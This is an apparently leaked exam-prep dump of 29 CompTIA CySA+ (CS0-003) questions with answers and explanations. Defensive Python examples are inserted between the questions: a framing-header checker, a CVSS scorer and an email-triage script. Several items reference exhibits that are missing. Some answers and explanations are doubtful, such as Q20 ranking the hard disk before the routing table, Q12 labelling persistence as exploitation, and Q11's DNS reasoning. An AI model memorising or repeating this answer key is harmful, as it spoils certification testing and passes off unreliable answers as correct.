Pass2Lead CS0 003

CYSA-003

Uploaded by

hena

100% Real IT Exam Q&As.

Easily Pass with a High Score.

Copyright © Pass2Lead.com, All Rights Reserved.

All our exam practice questions and answers are only for our product buyers to get prepared for their
coming certification examinations. Any unauthorized sharing is forbidden. It may cause the suspension
of one's account, membership and product updates if there is a violation of this rule.
Join Our Telegram for Exclusive Services!

Dear customers, join our Telegram for personalized pre-sales inquiries or post-sales support. Scan the QR
code or click here to experience our dedicated services!

Join us, and you'll enjoy:

• Instant Responses: Our customer service team is always on standby, ready to answer any questions you
may have.
• Professional Support: No matter what product issues you encounter, our experts will provide professional
solutions.
• Latest Updates: Be the first to get updates on our products and exclusive offers.

Scan the QR code and join us to stay on track.

Join our Telegram family now! Let us help you easily solve all your problems and enjoy a worry-free
shopping experience.

https://t.me/certvip
Vendor: CompTIA

Exam Code: CS0-003

Exam Name: CompTIA Cybersecurity Analyst (CySA+)

Q&As: 427 (There are 6 parts in the dump, 427 questions in total.)
Exam A

QUESTION 1
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege
escalation, and has a significant impact on confidentiality and integrity but not on availability. Which of the
following CVE metrics would be most accurate for this zero-day threat?

A. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
B. CVSS:3.1/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:3.1/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:3.1/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

Correct Answer: A
Explanation

Explanation/Reference:
This answer matches the description of the zero-day threat. The attack vector is network (AV:N), the attack
complexity is low (AC:L), no privileges are required (PR:N), no user interaction is required (UI:N), the
scope is unchanged (S:U), the confidentiality and integrity impacts are high (C:H/I:H), and the availability
impact is low (A:L).
Official Reference: https://nvd.nist.gov/vuln-metrics/cvss

QUESTION 2
Which of the following tools would work best to prevent the exposure of PII outside of an organization?

A. PAM
B. IDS
C. PKI
D. DLP

Correct Answer: D
Explanation

Explanation/Reference:
Data loss prevention (DLP) is a tool that can prevent the exposure of PII outside of an organization by
monitoring, detecting, and blocking sensitive data in motion, in use, or at rest.

QUESTION 3
An organization conducted a web application vulnerability assessment against the corporate website, and
the following output was observed:
Which of the following tuning recommendations should the security analyst share?

A. Set an HttpOnly flag to force communication by HTTPS
B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D. Disable the cross-origin resource sharing header

Correct Answer: B
Explanation

Explanation/Reference:
The output shows that the web application is vulnerable to clickjacking attacks, which allow an attacker to
overlay a hidden frame on top of a legitimate page and trick users into clicking on malicious links. Blocking
requests without an X-Frame-Options header can prevent this attack by instructing the browser not to
display the page within a frame.
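As an added example (not part of the exam dump), the following script evaluates a response's headers the way a web vulnerability scanner judges framing protection and produces the tuning recommendation an analyst would share; the sample responses are constructed, and the browser rules it encodes (CSP frame-ancestors overrides X-Frame-Options; ALLOW-FROM is obsolete) are stated as assumptions in the docstring.

```python
"""Added example (not from the exam dump): assess an HTTP response for clickjacking
protection the way a web vulnerability scanner would, and produce the tuning advice.

Browser behaviour assumed: a Content-Security-Policy frame-ancestors directive, when
present, overrides X-Frame-Options; X-Frame-Options DENY or SAMEORIGIN protects the
page; ALLOW-FROM is obsolete and ignored by current browsers, so it counts as unprotected.
"""
from typing import List, Mapping, Optional, Tuple


def _header(headers: Mapping[str, str], name: str) -> Optional[str]:
    """Case-insensitive lookup, since HTTP header names are case-insensitive."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def _frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the source list of the frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.strip("'").lower() for p in parts[1:]]
    return None


def framing_protection(headers: Mapping[str, str]) -> Tuple[bool, str]:
    """Return (protected, reason) for one HTML response's headers."""
    csp = _header(headers, "Content-Security-Policy")
    ancestors = _frame_ancestors(csp) if csp is not None else None
    if ancestors is not None:
        # frame-ancestors takes precedence over X-Frame-Options when both are sent.
        if not ancestors or ancestors == ["none"]:
            return True, "CSP frame-ancestors 'none' forbids all framing"
        if "*" in ancestors:
            return False, "CSP frame-ancestors * lets any site frame the page"
        return True, f"CSP frame-ancestors limits framing to {ancestors}"
    xfo = _header(headers, "X-Frame-Options")
    if xfo is None:
        return False, "no X-Frame-Options or CSP frame-ancestors header; the page can be framed"
    value = xfo.strip().upper()
    if value in ("DENY", "SAMEORIGIN"):
        return True, f"X-Frame-Options {value} restricts framing"
    return False, f"X-Frame-Options {xfo!r} is invalid or obsolete and is ignored by browsers"


def tuning_recommendation(headers: Mapping[str, str]) -> str:
    """The recommendation an analyst would share for the response."""
    protected, reason = framing_protection(headers)
    if protected:
        return "No change needed: " + reason
    return (reason + ". Send 'X-Frame-Options: DENY' (or SAMEORIGIN) together with "
            "\"Content-Security-Policy: frame-ancestors 'none'\" on every HTML response.")


# Constructed responses. An HttpOnly cookie flag and a CORS Access-Control-Allow-Origin
# header (the distractors in Question 3) say nothing about whether the page may be framed.
VULNERABLE_RESPONSE = {
    "Content-Type": "text/html",
    "Set-Cookie": "session=abc123; HttpOnly; Secure",
    "Access-Control-Allow-Origin": "https://app.corp.example",
}
HARDENED_RESPONSE = {
    "Content-Type": "text/html",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
}
```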

QUESTION 4
Which of the following items should be included in a vulnerability scan report? (Choose two.)

A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan

Correct Answer: DE
Explanation

Explanation/Reference:
A vulnerability scan report should include information about the affected hosts, such as their IP addresses,
hostnames, operating systems, and services. It should also include a risk score for each vulnerability,
which indicates the severity and potential impact of the vulnerability on the host and the organization.
Official Reference: https://www.first.org/cvss/

QUESTION 5
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the
industry was happening approximately 45 days after a patch was released. Which of the following would
best protect this organization?

A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing

Correct Answer: A
Explanation

Explanation/Reference:
Mean time to remediate (MTTR) is a metric that measures how long it takes to fix a vulnerability after it is
discovered. An MTTR of 30 days would best protect the organization from the new attacks that are exploited
45 days after a patch is released, as it would ensure that the vulnerabilities are fixed before they are
exploited.

QUESTION 6
A security analyst recently joined the team and is trying to determine which scripting language is being
used in a production script to determine if it is malicious. Given the following script:

foreach ($user in Get-Content .\this.txt)
{
    # Show the account's current primary group (RID 513 is Domain Users)
    Get-ADUser $user -Properties primaryGroupID | Select-Object primaryGroupID
    # Ensure membership in Domain Users, then make it the primary group
    Add-ADGroupMember "Domain Users" -Members $user
    Set-ADUser $user -Replace @{primaryGroupID=513}
}

Which of the following scripting languages was used in the script?

A. PowerShell
B. Ruby
C. Python
D. Shell script

Correct Answer: A
Explanation

Explanation/Reference:
The script uses PowerShell syntax, such as cmdlets, parameters, variables, and comments. PowerShell is
a scripting language that can be used to automate tasks and manage systems.

QUESTION 7
A company's user accounts have been compromised. Users are also reporting that the company's internal
portal is sometimes only accessible through HTTP; other times, it is accessible through HTTPS. Which of
the following most likely describes the observed activity?

A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
B. An on-path attack is being performed by someone with internal access that forces users into port 80
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
D. An error was caused by BGP due to new rules applied over the company's internal routers

Correct Answer: B
Explanation
Explanation/Reference:
An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network
traffic between two parties. In this case, someone with internal access may be performing an on-path
attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is
used for HTTPS communication. This would allow the attacker to compromise the user accounts and
access the company’s internal portal.

QUESTION 8
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security
policies are shown below:

Security Policy 1006: Vulnerability Management


1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the
remediation of security vulnerabilities.
2. In situations where a choice must be made between confidentiality and availability, the Company shall
prioritize confidentiality of data over availability of systems and data.
3. The Company shall prioritize patching of publicly available systems and services over patching of
internally available systems.

According to the security policy, which of the following vulnerabilities should be the highest priority to
patch?

A. Name: THOR HAMMER
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Internal System
B. Name: CAP.SHIELD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
C. Name: LOKI.DAGGER
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
D. Name: THANOS.GAUNTLET
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System

Correct Answer: B
Explanation

Explanation/Reference:
Based on the security policy and the CVSSv3.1 Base Scores, vulnerability B (CAP.SHIELD) with a high
impact on confidentiality should be the highest priority to patch. It is an externally accessible system, and
since confidentiality takes precedence over availability, it should be addressed before other vulnerabilities.
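As an added example (not part of the exam dump), the following script parses CVSS v3.1 base vectors such as those in Question 1, computes the base score from the specification's formula, and ranks the four Question 8 findings under Security Policy 1006; the policy only fixes the top item, so the ordering among the remaining findings is this example's choice, as noted in the code.

```python
"""Added example (not from the exam dump): parse CVSS v3.1 base vectors, compute the
base score, and rank findings by Security Policy 1006 from Question 8. Policy recap:
(1) prioritize on CVSS v3.1 base metrics; (2) confidentiality outranks availability;
(3) externally reachable systems outrank internal ones.
"""
import math
import re

VECTOR_RE = re.compile(r"^CVSS:3\.[01]/((?:[A-Z]+:[A-Z]/?)+)$")

# Allowed values per CVSS v3.1 base metric; anything else (e.g. "AV:K") is rejected.
BASE_METRICS = {"AV": "NALP", "AC": "LH", "PR": "NLH", "UI": "NR",
                "S": "UC", "C": "NLH", "I": "NLH", "A": "NLH"}
IMPACT_RANK = {"N": 0, "L": 1, "H": 2}

# Metric weights from the CVSS v3.1 specification, section 7.4.
W_AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
W_AC = {"L": 0.77, "H": 0.44}
W_UI = {"N": 0.85, "R": 0.62}
W_CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
W_PR = {"U": {"N": 0.85, "L": 0.62, "H": 0.27},   # scope unchanged
        "C": {"N": 0.85, "L": 0.68, "H": 0.5}}    # scope changed


def parse_vector(vector: str) -> dict:
    """Return {metric: value} for a CVSS v3.x base vector, validating every value."""
    m = VECTOR_RE.match(vector.strip())
    if not m:
        raise ValueError(f"not a CVSS v3.x vector: {vector!r}")
    metrics = {}
    for item in m.group(1).strip("/").split("/"):
        key, value = item.split(":")
        if key not in BASE_METRICS or value not in BASE_METRICS[key]:
            raise ValueError(f"invalid metric {item!r} in {vector!r}")
        metrics[key] = value
    missing = sorted(set(BASE_METRICS) - set(metrics))
    if missing:
        raise ValueError(f"vector is missing base metrics {missing}")
    return metrics


def is_valid_vector(vector: str) -> bool:
    try:
        parse_vector(vector)
        return True
    except ValueError:
        return False


def roundup(x: float) -> float:
    """CVSS v3.1 Roundup: the smallest one-decimal value that is >= x."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(metrics: dict) -> float:
    """CVSS v3.1 base score, specification section 7.1."""
    iss = 1 - ((1 - W_CIA[metrics["C"]]) * (1 - W_CIA[metrics["I"]])
               * (1 - W_CIA[metrics["A"]]))
    changed = metrics["S"] == "C"
    impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15 if changed else 6.42 * iss
    exploitability = (8.22 * W_AV[metrics["AV"]] * W_AC[metrics["AC"]]
                      * W_PR[metrics["S"]][metrics["PR"]] * W_UI[metrics["UI"]])
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    return roundup(min(1.08 * total if changed else total, 10))


def priority_key(finding: dict) -> tuple:
    """Sort key for Policy 1006; a larger tuple means patch sooner. Precedence:
    external exposure, then C, I and A impact, then base score as a tiebreak. The page
    fixes only the top item (external and C:H); the rest of the order is this example's."""
    m = parse_vector(finding["cvss"])
    return (finding["exposure"] == "external", IMPACT_RANK[m["C"]],
            IMPACT_RANK[m["I"]], IMPACT_RANK[m["A"]], base_score(m))


def rank_findings(findings: list) -> list:
    """Names of the findings, most urgent first."""
    return [f["name"] for f in sorted(findings, key=priority_key, reverse=True)]


# Constructed from the four findings listed in Question 8.
FINDINGS = [
    {"name": "THOR HAMMER", "exposure": "internal",
     "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},
    {"name": "CAP.SHIELD", "exposure": "external",
     "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},
    {"name": "LOKI.DAGGER", "exposure": "external",
     "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},
    {"name": "THANOS.GAUNTLET", "exposure": "internal",
     "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},
]
```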

QUESTION 9
Which of the following will most likely ensure that mission-critical services are available in the event of an
incident?

A. Business continuity plan
B. Vulnerability management plan
C. Disaster recovery plan
D. Asset management plan

Correct Answer: C
Explanation

QUESTION 10
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several
high-risk cloud applications are used that increase the risk to the organization. Which of the following
solutions will assist in reducing the risk?

A. Deploy a CASB and enable policy enforcement
B. Configure MFA with strict access
C. Deploy an API gateway
D. Enable SSO to the cloud applications

Correct Answer: A
Explanation

Explanation/Reference:
A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise
by providing visibility and control over cloud applications and services. A CASB can enable policy
enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules,
encrypting sensitive data, and detecting anomalous user behavior.

QUESTION 11
An incident response team receives an alert to start an investigation of an internet outage. The outage is
preventing all users in multiple locations from accessing external SaaS resources. The team determines
the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

A. CDN
B. Vulnerability scanner
C. DNS
D. Web server

Correct Answer: C
Explanation

Explanation/Reference:
A distributed denial-of-service (DDoS) attack is a type of cyberattack that aims to overwhelm a target with a
large volume of traffic from multiple sources. A common technique for launching a DDoS attack is to
compromise DNS servers, which are responsible for resolving domain names into IP addresses. By
flooding DNS servers with malicious requests, attackers can disrupt the normal functioning of the internet
and prevent users from accessing external SaaS resources.
Official Reference: https://www.eccouncil.org/cybersecurity-exchange/threatintelligence/cyber-kill-chain-seven-steps-cyberattack/

QUESTION 12
A malicious actor has gained access to an internal network by means of social engineering. The actor
does not want to lose access in order to continue the attack. Which of the following best describes the
current stage of the Cyber Kill Chain that the threat actor is currently operating in?

A. Weaponization
B. Reconnaissance
C. Delivery
D. Exploitation

Correct Answer: D
Explanation

Explanation/Reference:
The Cyber Kill Chain is a framework that describes the stages of a cyberattack from reconnaissance to
actions on objectives. The exploitation stage is where attackers take advantage of the vulnerabilities they
have discovered in previous stages to further infiltrate the target and work toward their objectives. In this
case, the malicious actor has gained access to an internal network by means of social engineering and
does not want to lose access in order to continue the attack. This indicates that the actor is in the
exploitation stage of the Cyber Kill Chain.
Official Reference:
https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

QUESTION 13
An analyst finds that an IP address outside of the company network that is being used to run network and
vulnerability scans across external-facing assets. Which of the following steps of an attack framework is
the analyst witnessing?

A. Exploitation
B. Reconnaissance
C. Command and control
D. Actions on objectives

Correct Answer: B
Explanation

Explanation/Reference:
Reconnaissance is the first stage in the Cyber Kill Chain and involves researching potential targets before
carrying out any penetration testing. The reconnaissance stage may include identifying potential targets,
finding their vulnerabilities, discovering which third parties are connected to them (and what data they can
access), and exploring existing entry points as well as finding new ones. Reconnaissance can take place
both online and offline. In this case, an analyst finds that an IP address outside of the company network is
being used to run network and vulnerability scans across external-facing assets. This indicates that the
analyst is witnessing reconnaissance activity by an attacker.
Official Reference: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

QUESTION 14
An incident response analyst notices multiple emails traversing the network that target only the
administrators of the company. The email contains a concealed URL that leads to an unknown website in
another country. Which of the following best describes what is happening? (Choose two.)

A. Beaconing
B. Domain Name System hijacking
C. Social engineering attack
D. On-path attack
E. Obfuscated links
F. Address Resolution Protocol poisoning

Correct Answer: CE
Explanation

Explanation/Reference:
A social engineering attack is a type of cyberattack that relies on manipulating human psychology rather
than exploiting technical vulnerabilities. A social engineering attack may involve deceiving, persuading, or
coercing users into performing actions that benefit the attacker, such as clicking on malicious links,
divulging sensitive information, or granting access to restricted resources. An obfuscated link is a link that
has been disguised or altered to hide its true destination or purpose. Obfuscated links are often used by
attackers to trick users into visiting malicious websites or downloading malware. In this case, an incident
response analyst notices multiple emails traversing the network that target only the administrators of the
company. The email contains a concealed URL that leads to an unknown website in another country. This
indicates that the analyst is witnessing a social engineering attack using obfuscated links.

QUESTION 15
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application.
Which of the following recommendations would best mitigate this problem if applied along the SDLC
phase?

A. Conduct regular red team exercises over the application in production
B. Ensure that all implemented coding libraries are regularly checked
C. Use application security scanning as part of the pipeline for the CI/CD flow
D. Implement proper input validation for any data entry form

Correct Answer: C
Explanation

Explanation/Reference:
Application security scanning is a process that involves testing and analyzing applications for security
vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure
configuration. Application security scanning can help identify and fix security issues before they become
exploitable by attackers. Using application security scanning as part of the pipeline for the continuous
integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the same
vulnerabilities in a critical application during security scanning. This is because application security
scanning can be integrated into the development lifecycle and performed automatically and frequently as
part of the CI/CD process.

QUESTION 16
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The
analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window.
However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does
not have access to. Which of the following inhibitors to remediation do these systems and associated
vulnerabilities best represent?

A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows

Correct Answer: A
Explanation

Explanation/Reference:
Proprietary systems are systems that are owned and controlled by a specific vendor or manufacturer, and
that use proprietary standards or protocols that are not compatible with other systems. Proprietary systems
can pose a challenge for vulnerability management, as they may not allow users to access or modify their
configuration, update their software, or patch their vulnerabilities. In this case, two of the critical systems
cannot be upgraded due to a vendor appliance that the company does not have access to. This indicates
that these systems and associated vulnerabilities are examples of proprietary systems as inhibitors to
remediation.

QUESTION 17
The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

A. An output of characters > and " as the parameters used in the attempt
B. The vulnerable parameter ID http://172.31.15.2.php?id=2 and unfiltered characters returned
C. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
D. The vulnerable parameter and characters > and " with a reflected XSS attempt

Correct Answer: D
Explanation

Explanation/Reference:
A cross-site scripting (XSS) attack is a type of web application attack that injects malicious code into a web
page that is then executed by the browser of a victim user. A reflected XSS attack is a type of XSS attack
where the malicious code is embedded in a URL or a form parameter that is sent to the web server and
then reflected back to the victim's browser. In this case, the Nmap scan shows that the web server is
vulnerable to a reflected XSS attack, as it returns the characters > and " without any filtering or encoding.
The vulnerable parameter is id in the URL http://172.31.15.2.php?id=2.

QUESTION 18
Which of the following is the best action to take after the conclusion of a security incident to improve
incident response in the future?

A. Develop a call tree to inform impacted users
B. Schedule a review with all teams to discuss what occurred
C. Create an executive summary to update company leadership
D. Review regulatory compliance with public relations for official notification

Correct Answer: B
Explanation

Explanation/Reference:
One of the best actions to take after the conclusion of a security incident to improve incident response in
the future is to schedule a review with all teams to discuss what occurred, what went well, what went
wrong, and what can be improved. This review is also known as a lessons learned session or an after-
action report. The purpose of this review is to identify the root causes of the incident, evaluate the
effectiveness of the incident response process, document any gaps or weaknesses in the security controls,
and recommend corrective actions or preventive measures for future incidents.
Official Reference: https://www.eccouncil.org/cybersecurity-exchange/threatintelligence/cyber-kill-chain-seven-steps-cyberattack/

QUESTION 19
A security analyst received a malicious binary file to analyze. Which of the following is the best technique
to perform the analysis?

A. Code analysis
B. Static analysis
C. Reverse engineering
D. Fuzzing

Correct Answer: C
Explanation

Explanation/Reference:
Reverse engineering is a technique that involves analyzing a binary file to understand its structure,
functionality, and behavior. Reverse engineering can help security analysts perform malware analysis,
vulnerability research, exploit development, and software debugging. Reverse engineering can be done
using various tools, such as disassemblers, debuggers, decompilers, and hex editors.

QUESTION 20
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical
evidence for further investigation. Which of the following pieces of data should be collected first in order to
preserve sensitive information before isolating the server?

A. Hard disk
B. Primary boot partition
C. Malicious files
D. Routing table
E. Static IP address

Correct Answer: A
Explanation

Explanation/Reference:
The hard disk is the piece of data that should be collected first in order to preserve sensitive information
before isolating the server. The hard disk contains all the files and data stored on the server, which may
include evidence of malicious activity, such as malware installation, data exfiltration, or configuration
changes. The hard disk should be collected using proper forensic techniques, such as creating an image
or a copy of the disk and maintaining its integrity using hashing algorithms.

QUESTION 21
Which of the following security operations tasks are ideal for automation?

A. Suspicious file analysis:
Look for suspicious-looking graphics in a folder.
Create subfolders in the original folder based on category of graphics found.
Move the suspicious graphics to the appropriate subfolder.
B. Firewall IoC block actions:
Examine the firewall logs for IoCs from the most recently published zero-day exploit.
Take mitigating actions in the firewall to block the behavior found in the logs.
Follow up on any false positives that were caused by the block rules.
C. Security application user errors:
Search the error logs for signs of users having trouble with the security application.
Look up the user's phone number.
Call the user to help with any questions about using the application.
D. Email header analysis:
Check the email header for a phishing confidence metric greater than or equal to five.
Add the domain of the sender to the block list.
Move the email to quarantine.

Correct Answer: D
Explanation

Explanation/Reference:
Email header analysis is one of the security operations tasks that are ideal for automation. Email header
analysis involves checking the email header for various indicators of phishing or spamming attempts, such
as sender address spoofing, mismatched domains, suspicious subject lines, or phishing confidence
metrics. Email header analysis can be automated using tools or scripts that can parse and analyze email
headers and take appropriate actions based on predefined rules or thresholds.
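The option D playbook as an automation script, added here as an example that is not part of the exam dump. It assumes a mail gateway stamps a phishing confidence score in a header named X-Phish-Score (the header name and 0-9 scale are this example's invention); the messages are constructed, and unscored mail is deliberately routed to a human rather than auto-blocked.

```python
"""Added example (not from the exam dump): the email-header playbook of Question 21,
option D, as an automation script. Assumptions: the mail gateway stamps a phishing
confidence score 0-9 in a header named X-Phish-Score (name and scale are this
example's invention), and anything scoring 5 or higher is blocked and quarantined.
"""
from email import message_from_string
from email.utils import parseaddr
from typing import Dict, Optional, Set

SCORE_HEADER = "X-Phish-Score"   # assumed gateway header
THRESHOLD = 5                    # the "greater than or equal to five" rule from the page


def sender_domain(raw_message: str) -> Optional[str]:
    """Domain of the From: address. parseaddr() returns the real addr-spec, so a spoofed
    display name such as "ceo@corp.example" <x@evil.example> yields evil.example."""
    msg = message_from_string(raw_message)
    _, addr = parseaddr(msg.get("From", ""))
    if "@" not in addr:
        return None
    return addr.rsplit("@", 1)[1].lower()


def phishing_score(raw_message: str) -> Optional[int]:
    """Integer score from the gateway header, or None when absent or malformed."""
    value = message_from_string(raw_message).get(SCORE_HEADER)
    if value is None:
        return None
    try:
        return int(value.strip())
    except ValueError:
        return None


def triage(raw_message: str, blocklist: Set[str]) -> Dict[str, object]:
    """Apply the playbook: score >= THRESHOLD (or an already blocked sender domain)
    means add the domain to the block list and quarantine; otherwise deliver.
    An unscored message is delivered and flagged for a human, never auto-blocked."""
    domain = sender_domain(raw_message)
    score = phishing_score(raw_message)
    if domain in blocklist:
        return {"action": "quarantine", "domain": domain, "score": score,
                "reason": "sender domain already on block list"}
    if score is None:
        return {"action": "deliver", "domain": domain, "score": None,
                "reason": "no usable phishing score; route to analyst review"}
    if score >= THRESHOLD:
        if domain is not None:
            blocklist.add(domain)
        return {"action": "quarantine", "domain": domain, "score": score,
                "reason": f"score {score} >= {THRESHOLD}"}
    return {"action": "deliver", "domain": domain, "score": score,
            "reason": f"score {score} < {THRESHOLD}"}


# Constructed messages; only the headers matter for this playbook.
PHISH = """\
From: "helpdesk@corp.example" <alerts@mail-secure-login.example>
To: admin@corp.example
Subject: Password expiry notice
X-Phish-Score: 7

Your password expires today. Confirm it at the link below.
"""
CLEAN = """\
From: Alice <alice@corp.example>
To: admin@corp.example
Subject: Lunch
X-Phish-Score: 1

Lunch at noon?
"""
UNSCORED = """\
From: Bob <bob@partner.example>
To: admin@corp.example
Subject: Invoice

Attached.
"""
```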

QUESTION 22
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of
the following groups should the organization report the breach to?

A. PCI Security Standards Council
B. Local law enforcement
C. Federal law enforcement
D. Card issuer

Correct Answer: D
Explanation

Explanation/Reference:
Under the terms of PCI DSS, an organization that has experienced a breach of customer transactions
should report the breach to the card issuer. The card issuer is the financial institution that issues the
payment cards to the customers and that is responsible for authorizing and processing the transactions.
The card issuer may have specific reporting requirements and procedures for the organization to follow in
the event of a breach. The organization should also notify other parties that may be affected by the breach,
such as customers, law enforcement, or regulators, depending on the nature and scope of the breach.
Official Reference: https://www.pcisecuritystandards.org/

QUESTION 23
Which of the following is the best metric for an organization to focus on given recent investments in SIEM,
SOAR, and a ticketing system?

A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts

Correct Answer: A
Explanation

Explanation/Reference:
Mean time to detect (MTTD) is the best metric for an organization to focus on given recent investments in
SIEM, SOAR, and a ticketing system. MTTD is a metric that measures how long it takes to detect a
security incident or threat from the time it occurs. MTTD can be improved by using tools and processes
that can collect, correlate, analyze, and alert on security data from various sources. SIEM, SOAR, and
ticketing systems are examples of such tools and processes that can help reduce MTTD and enhance
security operations.
Official Reference: https://www.eccouncil.org/cybersecurityexchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack

QUESTION 24
A company is implementing a vulnerability management program and moving from an on-premises
environment to a hybrid IaaS cloud environment. Which of the following implications should be considered
on the new hybrid environment?

A. The current scanners should be migrated to the cloud
B. Cloud-specific misconfigurations may not be detected by the current scanners
C. Existing vulnerability scanners cannot scan IaaS systems
D. Vulnerability scans on cloud environments should be performed from the cloud

Correct Answer: B
Explanation

Explanation/Reference:
Cloud-specific misconfigurations are security issues that arise from improper or inadequate configuration
of cloud resources, such as storage buckets, databases, virtual machines, or containers. Cloud-specific
misconfigurations may not be detected by the current scanners that are designed for on-premises
environments, as they may not have the visibility or access to the cloud resources. Therefore, one of the
implications that should be considered on the new hybrid environment is that cloud-specific
misconfigurations may not be detected by the current scanners.

QUESTION 25
A security alert was triggered when an end user tried to access a website that is not allowed per
organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the
authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation,
to build the case for the investigation. Which of the following is the best way to ensure that the investigation
complies with HR or privacy policies?

A. Create a timeline of events detailing the date stamps, user account, hostname and IP information
associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information. Password-protect the
evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access will
not be able to easily identify the case as an HR-related investigation
D. Notify the SOC manager for awareness after confirmation that the activity was intentional

Correct Answer: B
Explanation

Explanation/Reference:
The best way to ensure that the investigation complies with HR or privacy policies is to ensure that the
case details do not reflect any user-identifiable information, such as name, email address, phone number,
or employee ID. This can help protect the privacy and confidentiality of the user and prevent any potential
discrimination or retaliation. Additionally, password protecting the evidence and restricting access to
personnel related to the investigation can help preserve the integrity and security of the evidence and
prevent any unauthorized or accidental disclosure or modification.

QUESTION 26
Which of the following is the first step that should be performed when establishing a disaster recovery
plan?

A. Agree on the goals and objectives of the plan
B. Determine the site to be used during a disaster
C. Demonstrate adherence to a standard disaster recovery process
D. Identify applications to be run during a disaster

Correct Answer: A
Explanation

Explanation/Reference:
The first step that should be performed when establishing a disaster recovery plan is to agree on the goals
and objectives of the plan. The goals and objectives of the plan should define what the plan aims to
achieve, such as minimizing downtime, restoring critical functions, ensuring data integrity, or meeting
compliance requirements. The goals and objectives of the plan should also be aligned with the business
needs and priorities of the organization and be measurable and achievable.

QUESTION 27
A technician identifies a vulnerability on a server and applies a software patch. Which of the following
should be the next step in the remediation process?

A. Testing
B. Implementation
C. Validation
D. Rollback

Correct Answer: C
Explanation

Explanation/Reference:
The next step in the remediation process after applying a software patch is validation. Validation is a
process that involves verifying that the patch has been successfully applied, that it has fixed the
vulnerability, and that it has not caused any adverse effects on the system or application functionality or
performance. Validation can be done using various methods, such as scanning, testing, monitoring, or
auditing.

QUESTION 28
The analyst reviews the following endpoint log entry:

Which of the following has occurred?

A. Registry change
B. Rename computer
C. New account introduced
D. Privilege escalation

Correct Answer: C
Explanation

Explanation/Reference:
The endpoint log entry shows that a new account named “admin” has been created on a Windows system
with a local group membership of “Administrators”.
This indicates that a new account has been introduced on the system with administrative privileges. This
could be a sign of malicious activity, such as privilege escalation or backdoor creation, by an attacker who
has compromised the system.

QUESTION 29
A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a
SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the
security program did?

A. Data enrichment
B. Security control plane
C. Threat feed combination
D. Single pane of glass

Correct Answer: D
Explanation

Explanation/Reference:
A single pane of glass is a term that describes a unified view or interface that integrates multiple tools or
data sources into one dashboard or console. A single pane of glass can help improve security operations
by providing visibility, correlation, analysis, and alerting capabilities across various security controls and
systems. A single pane of glass can also help reduce complexity, improve efficiency, and enhance
decision making for security analysts. In this case, a security program was able to achieve a 30%
improvement in MTTR by integrating security controls into a SIEM, which provides a single pane of glass
for security operations.
